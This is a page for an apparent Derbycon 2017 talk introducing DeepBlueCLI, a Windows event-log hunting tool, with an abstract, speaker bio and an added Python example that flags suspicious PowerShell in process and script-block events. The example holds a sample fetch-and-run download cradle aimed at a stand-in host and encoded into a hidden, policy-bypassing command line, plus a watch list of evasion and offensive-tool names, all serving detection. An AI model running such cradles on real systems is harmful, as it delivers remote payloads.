Introducing DeepBlueCLI v2, now available in PowerShell and Python - Eric Conrad Derbycon 2017 (Hacking Illustrated Series InfoSec Tutorial Videos)


Recent malware attacks leverage PowerShell for post exploitation. Why? No EXE for antivirus or HIPS to squash, nothing saved to the filesystem, sites that use application whitelisting allow PowerShell, and little to no default logging. Event logs continue to be the best source to centrally hunt malice in a Windows environment. Virtually all malware may be detected (including the latest PowerShell-fueled post exploitation) via event logs, after making small tweaks to the logging configuration. DeepBlueCLI will go toe-to-toe with the latest attacks: this talk will explore the evidence malware leaves behind, leveraging Windows command line auditing (now natively available in Windows 7+) and PowerShell logging. DeepBlueCLI is an open source framework that automatically parses Windows event logs, either on Windows (PowerShell version) or now on ELK (Elasticsearch, Logstash and Kibana) running on Linux/Unix (Python version). ELK has revolutionized SIEMs, offering an open source alternative to expensive commercial solutions, and scaling to sizes many commercial SIEMs cannot reach.
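The abstract describes the two evidence sources DeepBlueCLI works from: process creation events carrying the full command line (Security event 4688 once command line auditing is enabled) and PowerShell script block logging (Microsoft-Windows-PowerShell/Operational event 4104). The following is an added illustration, not DeepBlueCLI's own code, of the kind of triage such a tool performs over events that have already been flattened to JSON (as a Winlogbeat/Logstash pipeline feeding ELK might emit them). The field names, the 1000-character "long command line" threshold, the token list and the sample events are all assumptions constructed for this example; the one piece that is not an assumption is the decoding step, since PowerShell's -EncodedCommand takes Base64 of the UTF-16LE script text and accepts any unambiguous prefix of the switch (-e, -en, -enc, ...).

```python
"""DeepBlueCLI-style triage of flattened Windows event records (added example)."""
import base64
import binascii
import json
import re
from typing import Optional

# -EncodedCommand and its unambiguous prefixes (-e, -en, -enc, ...) followed by a
# Base64 blob. "-ExecutionPolicy" is deliberately not matched (no "n" after "-e").
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Assumption for this example; DeepBlueCLI tunes its own threshold.
LONG_CMDLINE = 1000

# Assumed watch list of download-cradle, evasion and offensive-tooling strings.
SUSPICIOUS_TOKENS = [
    "Net.WebClient", "DownloadString", "DownloadFile", "IEX", "Invoke-Expression",
    "-W Hidden", "-WindowStyle Hidden", "-Exec Bypass", "-ExecutionPolicy Bypass",
    "Invoke-Mimikatz", "Invoke-Shellcode", "FromBase64String",
]

# Constructed sample: a download cradle as an attacker would encode it.
PAYLOAD = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/payload.ps1")'
ENCODED_BLOB = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed sample events; field names are assumptions, not a real pipeline's schema.
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "ws01",
     "command_line": '"C:\\Windows\\System32\\notepad.exe" C:\\Users\\alice\\notes.txt'},
    {"event_id": 4688, "host": "ws01",
     "command_line": f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc {ENCODED_BLOB}"},
    {"event_id": 4688, "host": "ws02", "command_line": "cmd.exe /c whoami"},
    {"event_id": 4104, "host": "ws02",
     "script_block_text": "function Invoke-Mimikatz {\n  [CmdletBinding()] param()\n}"},
]


def decode_b64_utf16(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand blob (Base64 over UTF-16LE); None if it is not one."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext script passed via -EncodedCommand, or None if absent."""
    m = ENCODED_FLAG.search(command_line)
    return decode_b64_utf16(m.group(1)) if m else None


def find_suspicious_tokens(text: str) -> list:
    """Case-insensitive substring match against the watch list, in list order."""
    lowered = text.lower()
    return [t for t in SUSPICIOUS_TOKENS if t.lower() in lowered]


def analyze_event(event: dict) -> list:
    """Return human-readable reasons an event deserves a look (empty if none)."""
    reasons = []
    if event.get("event_id") == 4688:
        cmd = event.get("command_line", "")
        if len(cmd) > LONG_CMDLINE:
            reasons.append(f"long command line ({len(cmd)} chars)")
        # Search tokens in the visible command line with the Base64 blob masked out
        # (random Base64 can contain "iex"), plus the decoded script if there is one.
        visible, decoded = cmd, None
        m = ENCODED_FLAG.search(cmd)
        if m:
            decoded = decode_b64_utf16(m.group(1))
            visible = cmd[:m.start(1)] + "<base64>" + cmd[m.end(1):]
        if decoded is not None:
            reasons.append("encoded PowerShell command; decoded: " + decoded.strip())
        hits = find_suspicious_tokens(visible + " " + (decoded or ""))
        if hits:
            reasons.append("suspicious tokens: " + ", ".join(hits))
    elif event.get("event_id") == 4104:
        hits = find_suspicious_tokens(event.get("script_block_text", ""))
        if hits:
            reasons.append("suspicious script block tokens: " + ", ".join(hits))
    return reasons


def triage(events: list) -> list:
    """Run analyze_event over a record list and keep only the events with findings."""
    findings = []
    for index, event in enumerate(events):
        reasons = analyze_event(event)
        if reasons:
            findings.append({"index": index, "host": event.get("host"),
                             "event_id": event.get("event_id"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(json.dumps(finding, indent=2))
```

The decode step is the part worth remembering: an analyst who only grepped the raw 4688 command line for "DownloadString" would miss the second sample event entirely, because the cradle is invisible until the -Enc blob is Base64-decoded and read as UTF-16LE. Masking the blob before token matching avoids false hits on Base64 that happens to spell "IEX".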

Eric's career began in 1991 as a UNIX systems administrator for a small oceanographic communications company. He gained information security experience in a variety of industries, including research, education, power, Internet, and health care. He is now CTO of Backshore Communications, a company focusing on hunt teaming, intrusion detection, incident handling, and penetration testing. He is the lead author of the CISSP Study Guide. Eric is a graduate of the SANS Technology Institute with a master of science degree in information security engineering. In addition to the CISSP, he holds the prestigious GIAC Security Expert (GSE) certification as well as many other GIAC certifications. Eric also blogs about information security at www.ericconrad.com.

